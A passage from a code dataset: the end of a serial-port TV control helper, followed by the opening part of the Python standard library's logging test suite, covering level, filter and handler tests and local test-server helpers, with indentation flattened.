ser.xonxoff = False
ser.rtscts = False
ser.dsrdtr = False
# prepare command
serialcmd = command + '\r\n'
# execute command
ser.write(serialcmd.encode())
out = ''
            while out not in ('WAIT', 'OK', 'ERR', '0', '1'):
# wait for answer
while ser.inWaiting() == 0:
time.sleep(0.5)
# read answers
while ser.inWaiting() > 0:
char = ser.read(1).decode('utf-8')
if char != "\n" and char != "\r":
out += char
if out == "WAIT":
out = ""
except Exception:
return "ERROR"
return out
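# Hedged usage sketch (illustrative; '/dev/ttyUSB0' is hard-coded above and the
# command strings are assumptions about the attached TV's serial protocol):
#
#   TvSerial.writeCommandAsync('ka 01 01')   # fire-and-forget on a daemon thread
#   status = TvSerial.writeCommand('ka 01 ff')  # blocking, returns e.g. 'OK'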
|
test_logging.py
|
# Copyright 2001-2022 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2022 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import itertools
import gc
import json
import os
import queue
import random
import re
import shutil
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.logging_helper import TestHandler
import textwrap
import threading
import asyncio
import time
import unittest
import warnings
import weakref
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
asyncore = warnings_helper.import_deprecated('asyncore')
smtpd = warnings_helper.import_deprecated('smtpd')
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = threading_helper.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
threading_helper.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_handler_filter_replaces_record(self):
def replace_message(record: logging.LogRecord):
record = copy.copy(record)
record.msg = "new message!"
return record
        # Set up a logging hierarchy such that "child" and its handler
# (and thus `replace_message()`) always get called before
# propagating up to "parent".
# Then we can confirm that `replace_message()` was able to
# replace the log record without having a side effect on
# other loggers or handlers.
parent = logging.getLogger("parent")
child = logging.getLogger("parent.child")
stream_1 = io.StringIO()
stream_2 = io.StringIO()
handler_1 = logging.StreamHandler(stream_1)
handler_2 = logging.StreamHandler(stream_2)
handler_2.addFilter(replace_message)
parent.addHandler(handler_1)
child.addHandler(handler_2)
child.info("original message")
handler_1.flush()
handler_2.flush()
self.assertEqual(stream_1.getvalue(), "original message\n")
self.assertEqual(stream_2.getvalue(), "new message!\n")
def test_logging_filter_replaces_record(self):
records = set()
class RecordingFilter(logging.Filter):
def filter(self, record: logging.LogRecord):
records.add(id(record))
return copy.copy(record)
logger = logging.getLogger("logger")
logger.setLevel(logging.INFO)
logger.addFilter(RecordingFilter())
logger.addFilter(RecordingFilter())
logger.info("msg")
self.assertEqual(2, len(records))
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
def make_temp_file(*args, **kwargs):
fd, fn = tempfile.mkstemp(*args, **kwargs)
os.close(fd)
return fn
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fn = make_temp_file()
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, encoding='utf-8', delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fn = make_temp_file()
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args, encoding="utf-8")
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipIf(
support.is_emscripten, "Emscripten cannot fstat unlinked files."
)
@threading_helper.requires_working_threading()
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fn = make_temp_file('.log', 'test_logging-3-')
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, encoding='utf-8', delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@support.requires_fork()
@threading_helper.requires_working_threading()
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt', encoding='utf-8'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing-based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, detecting a regression less reliably via
# timing is acceptable for the sake of simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0:
# Child process
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else:
# Parent process
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
support.wait_process(pid, exitcode=0)
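# Illustrative sketch (not part of the test suite): the os.register_at_fork
# mechanism referred to above is what logging uses internally to reinitialise
# handler locks in a forked child.  This standalone example shows the same
# pattern with a plain threading.Lock; the _example_* name is ours.
def _example_register_at_fork_sketch():
    import os
    import threading

    lock = threading.Lock()

    def reinit_lock_in_child():
        # Give the child a fresh, unlocked lock so it cannot inherit a lock
        # that happened to be held in the parent at fork time.
        nonlocal lock
        lock = threading.Lock()

    if hasattr(os, 'register_at_fork'):
        os.register_at_fork(after_in_child=reinit_lock_in_child)
    return lock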
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
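# Usage sketch (illustrative only, not exercised by the tests): setStream()
# as covered in test_stream_setting returns the previous stream, or None when
# the new stream is the same object, so a caller can capture output
# temporarily and then restore the original stream.
def _example_set_stream_roundtrip():
    import io
    import logging

    handler = logging.StreamHandler()          # defaults to sys.stderr
    buf = io.StringIO()
    previous = handler.setStream(buf)          # previous is the old stream
    try:
        handler.emit(logging.makeLogRecord({'msg': 'captured'}))
    finally:
        handler.setStream(previous)            # put the original stream back
    return buf.getvalue()                      # 'captured\n'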
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self._quit = False
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
while not self._quit:
asyncore.loop(poll_interval, map=self._map, count=1)
def stop(self):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
"""
self._quit = True
threading_helper.join_thread(self._thread)
self._thread = None
self.close()
asyncore.close_all(map=self._map, ignore_all=True)
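# Minimal usage sketch for TestSMTPServer (illustrative only; SMTPHandlerTest
# below is the real consumer).  A handler is just a callable receiving
# (peer, mailfrom, rcpttos, data), and a port of 0 asks the OS for a free
# port, afterwards available as server.port.
def _example_test_smtp_server_usage():
    received = []
    sockmap = {}
    server = TestSMTPServer(('localhost', 0),
                            lambda *args: received.append(args),
                            0.001, sockmap)
    server.start()
    try:
        # A real caller would now point an smtplib.SMTP client or an
        # SMTPHandler at ('localhost', server.port).
        pass
    finally:
        server.stop()
    return received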
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self):
"""
Tell the server thread to stop, and wait for it to do so.
"""
self.shutdown()
if self._thread is not None:
threading_helper.join_thread(self._thread)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:param bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:param bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
